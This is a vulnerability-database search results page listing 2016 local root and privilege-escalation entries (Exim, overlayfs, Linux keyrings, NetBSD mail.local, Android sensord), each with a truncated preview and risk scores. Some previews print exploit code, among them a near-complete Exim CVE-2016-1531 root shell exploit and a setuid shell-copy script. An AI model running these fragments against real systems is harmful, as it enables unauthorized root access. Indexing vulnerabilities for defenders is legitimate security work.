Lucene search
+L

1469 matches found

OSV
OSV
added 2016/09/26 2:59 p.m.13 views

CVE-2016-6276

Citrix Linux Virtual Delivery Agent aka VDA, formerly Linux Virtual Desktop before 1.4.0 allows local users to gain root privileges via unspecified vectors...

7.8CVSS5.8AI score0.00349EPSS
SaveExploits0References2
OSV
OSV
added 2016/09/25 10:59 a.m.6 views

CVE-2016-4710

WindowServer in Apple OS X before 10.12 allows local users to obtain root access via vectors that leverage "type confusion," a different vulnerability than CVE-2016-4709...

7.8CVSS7.3AI score0.00465EPSS
SaveExploits0References5
CNVD
CNVD
added 2016/09/21 12:00 a.m.11 views

EMC Avamar Data Store and Avamar Virtual Edition Command Injection Vulnerability

EMC Avamar is a backup and recovery solution from EMC Corporation. The solution provides data backup, disaster recovery, deduplication, etc. Avamar Data Store ADS is one of the components used for data backup; Avamar Virtual Edition AVE is one of the components used to realize the replication...

7.8CVSS7.4AI score0.00414EPSS
SaveExploits0References1
Tenable Nessus
Tenable Nessus
added 2016/07/22 12:00 a.m.39 views

Juniper Junos SRX Series Upgrade Handling Local Root Authentication Bypass (JSA10753)

According to its self-reported version number, the remote Juniper Junos device is affected by a security bypass vulnerability due to a flaw that is triggered when using the partition option during an upgrade. A local attacker can exploit this to bypass authentication checks and access the root...

7.8CVSS7.2AI score0.0045EPSS
SaveExploits0References2
Packet Storm
Packet Storm
added 2016/07/22 12:00 a.m.47 views

NetBSD mail.local(8) Local Root

// Source: http://akat1.pl/?id=2 include include include include include include include include define ATRUNPATH "/usr/libexec/atrun" define MAILDIR "/var/mail" static int overwriteatrunvoid char script = "! /bin/sh\n" "cp /bin/ksh /tmp/ksh\n" "chmod +s /tmp/ksh\n"; sizet size; FILE fh; int rv =...

7.7AI score0.03563EPSS
SaveExploits7
zdt
zdt
added 2016/07/04 12:00 a.m.38 views

Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation

Exploit for linux platform in category local exploits / -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hello List, This is just a minor issue in Exim, no replies so far, so publication should be OK. Introduction: ============ Exim4 in some variants is started as root but switches to uid/gid...

6.8AI score
SaveExploits0
Exploit DB
Exploit DB
added 2016/07/03 12:00 a.m.71 views

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation

/ Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40053.zip / --------------------------------------------------- decr.c --------------------------------------------------- / Ubuntu 16.04 local root exploit - netfilter targetoffset OOB...

5.3AI score
SaveExploits0
CNVD
CNVD
added 2016/06/22 12:00 a.m.6 views

Red Hat Enterprise Linux setroubleshoot allow_execmod plugin shell command injection vulnerability

Red Hat Enterprise Linux RHEL is a Linux operating system maintained and distributed by Red Hat for business users. setroubleshoot is one of the troubleshooting tools. A shell command injection vulnerability exists in the allowexecmod plugin in RHEL's setroubleshoot. A local attacker could exploi...

7CVSS7.5AI score0.00474EPSS
SaveExploits1References1
CNVD
CNVD
added 2016/06/22 12:00 a.m.4 views

Red Hat Enterprise Linux setroubleshoot allow_execstack plugin shell command injection vulnerability

Red Hat Enterprise Linux RHEL is a Linux operating system maintained and distributed by Red Hat for business users. setroubleshoot is one of the troubleshooting tools. A shell command injection vulnerability exists in the allowexecstack plugin in RHEL's setroubleshoot. A local attacker could...

7CVSS7.5AI score0.00475EPSS
SaveExploits1References1
OpenVAS
OpenVAS
added 2016/03/15 12:00 a.m.69 views

Exim < 4.86.2 Local Root / Privilege Escalation Vulnerability

Exim is prone to a local root privilege escalation vulnerability. SPDX-FileCopyrightText: 2016 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:exim:exim"; if...

7CVSS6.7AI score0.05901EPSS
SaveExploits13References1
Debian
Debian
added 2016/03/14 5:48 a.m.105 views

[SECURITY] [DSA 3517-1] exim4 security update

------------------------------------------------------------------------- Debian Security Advisory DSA-3517-1 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso March 14, 2016 https://www.debian.org/security/faq -...

6.9CVSS2.1AI score0.05901EPSS
SaveExploits13
Debian
Debian
added 2016/03/14 5:48 a.m.104 views

[SECURITY] [DSA 3517-1] exim4 security update

------------------------------------------------------------------------- Debian Security Advisory DSA-3517-1 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso March 14, 2016 https://www.debian.org/security/faq -...

7CVSS6.9AI score0.05901EPSS
SaveExploits13
OSV
OSV
added 2016/03/14 12:00 a.m.35 views

DSA-3517-1 exim4 - security update

Bulletin has no description...

7CVSS6.9AI score0.05901EPSS
SaveExploits13
zdt
zdt
added 2016/03/09 12:00 a.m.293 views

Exim 4.84-3 - Privilege Escalation

Exploit for windows platform in category local exploits !/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps 0day.today 2018-02-19...

6.9CVSS0.3AI score0.05901EPSS
SaveExploits13
Packet Storm
Packet Storm
added 2016/03/08 12:00 a.m.1893 views

Exim 4.84-3 Local Root / Privilege Escalation

!/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...

6.9CVSS1.2AI score0.05901EPSS
SaveExploits13
Packet Storm
Packet Storm
added 2016/02/29 12:00 a.m.29 views

ASAN/SUID Local Root Exploit

!/bin/bash unsanitary.sh - ASAN/SUID Local Root Exploit Exploits er, unsanitized env var passing in ASAN which leads to file clobbering as root when executing setuid root binaries compiled with ASAN. Uses an overwrite of /etc/ld.so.preload to get root on a vulnerable system. Supply your own targe...

0.1AI score
SaveExploits0
Packet Storm
Packet Storm
added 2016/01/27 12:00 a.m.44 views

Android sensord Local Root

/ Android sensord 0day root exploit by s0m3b0dy tested on LG L7 PL need pentests? s0m3b0dy1atgmail.com some Android devices have sensord deamon, for some ROMs the deamon is running as root processthere we can use this exploit and --------- root@android:/ strace sensord...

0.3AI score
SaveExploits0
Packet Storm
Packet Storm
added 2016/01/20 12:00 a.m.57 views

Linux Kernel REFCOUNT Overflow / Use-After-Free

Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings Date: 19/1/2016 Exploit Author: Perception Point Team CVE : CVE-2016-0728 / CVE-2016-0728 local root exploit modified by Federico Bento to read kernel symbols from /proc/kallsyms props to grsecurity/PaX for preventing this i...

7.2CVSS0.7AI score0.03442EPSS
SaveExploits14
seebug.org
seebug.org
added 2016/01/18 12:00 a.m.448 views

Ubuntu 14.04 LTS, 15.10 overlayfs - Local Root Exploit

No description provided by source. / just another overlayfs exploit, works on kernels before 2015-12-26 Exploit Title: overlayfs local root Date: 2016-01-05 Exploit Author: rebel Version: Ubuntu 14.04 LTS, 15.10 and more Tested on: Ubuntu 14.04 LTS, 15.10 CVE : CVE-2015-8660 blah@ubuntu:$ id...

7.2CVSS6.6AI score0.22374EPSS
SaveExploits13
Packet Storm
Packet Storm
added 2016/01/06 12:00 a.m.82 views

Ubuntu 14.04 LTS / 15.10 overlayfs Local Root

/ just another overlayfs exploit, works on kernels before 2015-12-26 Exploit Title: overlayfs local root Date: 2016-01-05 Exploit Author: rebel Version: Ubuntu 14.04 LTS, 15.10 and more Tested on: Ubuntu 14.04 LTS, 15.10 CVE : CVE-2015-8660 blah@ubuntu:$ id uid=1001blah gid=1001blah groups=1001bl...

7.2CVSS0.3AI score0.22374EPSS
SaveExploits13
Rows per page
Query Builder